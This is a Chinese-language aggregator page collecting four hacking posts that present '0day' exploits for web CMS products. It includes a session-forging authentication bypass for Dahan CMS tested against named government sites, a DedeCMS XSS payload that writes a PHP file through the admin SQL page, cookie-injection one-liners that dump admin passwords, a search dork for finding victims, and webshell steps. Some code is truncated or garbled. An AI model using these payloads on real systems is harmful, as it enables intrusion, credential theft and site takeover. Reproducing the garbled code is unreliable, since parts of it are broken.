大汉网络0day通杀所有系统和版本

时间:2024年04月08日

/

来源:雪松

/

编辑:本站小编

收藏本文

下载本文

下面小编给大家整理了大汉网络0day通杀所有系统和版本,本文共4篇,供大家阅读参考。本文原稿由网友“雪松”提供。

篇1:大汉网络0day通杀所有系统和版本

管理后台权限绕过,进入后台后轻松GetShell,

经验证通杀所有系统和版本,包括:jcms,jact,jsearch,vipchat,vc,xxgk等等,

我估计这是大汉影响范围最大的漏洞了。求加精!

Setup目录Session权限绕过:

代码分析 /jcms/setup/opr_licenceinfo.jsp : //获取Session中cookie_username的值,赋值给strUser String strUser = (String)sessions.getAttribute(“cookie_username”); // 判断strUser值 是否为空? if( strUser == null || strUser.trim.length() == 0 ) { out.println('请先登录!') return; } //如果为空,则未登录,直接返回// 如果不为空,说明已经登录

逆向java servlet 的代码 /VerifyCodeServlet

// 获取请求参数 var,赋值给 strVar String strVar = Convert.getParameter(request, “var”, “”); if(strVar == null){ request.getSession().setAttribute(“COMPLAT”, str_code); // 将随机码保存到SESSION中 }else{ // 如果 strVar 不为空的话,创建 strVar 为名称的 SESSION 值 request.getSession().setAttribute(strVar, str_code); // 将随机码保存到SESSION中 }所以通过参数 var, 就可以控制SESSION的名称的创建

通过两个程序的分析,整理一下:

1. opr_licenceinfo.jsp需要一个SESSION cookie_username 不为空,就可以成功登录

2. /VerifyCodeServlet 可以 创建任意 SESSION的key值

所以两者配合,就可以构造成功登录了。

直接访问opr_licenceinfo.jsp 需要登录

www.zgzhijiang.gov.cn/jcms/setup/opr_licenceinfo.jsp

添加一个Session值 cookie_username

www.zgzhijiang.gov.cn/jcms/VerifyCodeServlet?var=cookie_username

然后再次访问/jcms/setup/opr_licenceinfo.jsp,成功登录,

Licence文件上传webshell漏洞,不演示了,参考:wooyun.org/bugs/wooyun--052699

vipchat 的 POC:

sdds.gov.cn/vipchat/setup/

sdds.gov.cn/vipchat/VerifyCodeServlet?var=cookie_username

sdds.gov.cn/vipchat/setup/admin.jsp

jsearch 的 POC:

www.hyhjbh.com/jsearch/setup/

www.hyhjbh.com/jsearch/VerifyCodeServlet?var=cookie_username

www.hyhjbh.com/jsearch/setup/opr_licenceinfo.jsp

其他的大汉系统,就不一一罗列了,

这算是一个VerifyCodeServlet组件的逻辑漏洞吧,

大汉的所有系统都包含VerifyCodeServlet这个组件,用于生成验证码,

所以导致了所有系统的通杀,影响范围非常广了。

注意:

1. 有一些站点,访问setup目录,返回403,禁止了访问。

2. 大汉新版,不影响。

解决方案:

修复VerifyCodeServlet组件的逻辑。

篇2:DEDECMS xss 0day 通杀所有版本漏洞预警

漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行,可getshell

目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

下面说说利用方法。

条件有2个:

1.开启注册

2.开启投稿

注册会员—-发表文章

内容填写:

新建xss.css,内容:

body{

background-image:url(´javascript.:document.write(“”)´)

}

新建xss.js文件,内容:

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType(´text/xml´);

}

} else if(window.ActiveXObject) {

var versions = [´Microsoft.XMLHTTP´, ´MSXML.XMLHTTP´, ´Microsoft.XMLHTTP´, ´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´, ´Msxml2.XMLHTTP.4.0´, ´MSXML2.XMLHTTP.3.0´, ´MSXML2.XMLHTTP´];

for(var i=0; i

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

xmlhttp=request;

function getFolder( url ){

bj = url.split(´/´)

return obj[obj.length-2]

}

Url = top.location.href;

u = getFolder(oUrl);

add_admin();

function add_admin(){

var url= “/”+u+“/sys_sql_query.php”;

var params =“fmdo=edit&backurl=&activepath=/data&filename=haris.php&str=

篇3:简单文章管理系统 cookie注入漏洞通杀所有版本漏洞预警

简单文章管理系统采用一级分类,界面简洁,功能简单实用,删除文章后,文章相关图片也一并删除减

少垃圾文件的存在。

后台管理入口域名/admin 用户名和密码都是admin

后台模块:

信息管理: 发布信息 修改信息 查找信息 推荐信息

系统管理: 类别管理 用户管理 系统设置 数据库维护

漏洞文件:article.asp Check_SqlIn.asp 代码我就不作分析了。网上多的是,差不多的问题。

漏洞说明:过滤不严,导致可cookie注入。

好像有两个字段14和12。

exp:

javascript.:alert(document.cookie=”id=“+escape(”119 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin“));

javascript.:alert(document.cookie=”id=“+escape(”235 union select 1,2,3,user,5,password,7,8,9,10,11,12 from admin“));

利用方法我就不说了,网上很多,整天JJYY还是这点破事,

有图有真像:

拿shell方法:

暂时没有更好的办法,但是如果他的数据库是.asp .asa后缀的话,可在

www.xxx.com/data/!%article%!.asp

改变下成:www.xxx.com/data/%21%25article%25%21.asp

没对数据库访问进行处理。 ING~~~~~~~

用户管理--->增加管理员中 帐户写上一句话变型马。然后菜刀之类的连就可以了。

dork:

inurl:list.asp?classid=1 首页 上一页 下一页 尾页 页次:页 共 条记录 条记录/页 转到:

注意后面的字哦。。。^_^

From: www.0855.tv

By: Mr.DzY

篇4:启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警

by Mr.DzY

from www.0855.tv

由于网上开源的东西多了,版权就无从查起,这天姑且就这么称乎它吧。

具体版权无从查知,相似的内核太多。

源码下载:www.mycodes.net/25/4628.htm

:www.tb11.net/

官方演示:www.tb11.net/system/xitong/

www.tb11.net/system/xitong2/

www.tb11.net/system/xitong3/

直接上exploit:

javascript.:alert(document.cookie=”id=“+escape(”1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin\"));

test:www.tb11.net/system/xitong/shownews.asp?id=210

测试关键字自己找,

网络/系统工程师、系统管理员/简历

综合布线系统的网络测试

所有网络手机都来注册手机QQ网络技巧

网络信息下的图书馆管理系统

复杂系统布尔网络模型及应用

下载大汉网络0day通杀所有系统和版本(锦集4篇)
大汉网络0day通杀所有系统和版本.doc
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档
点击下载本文文档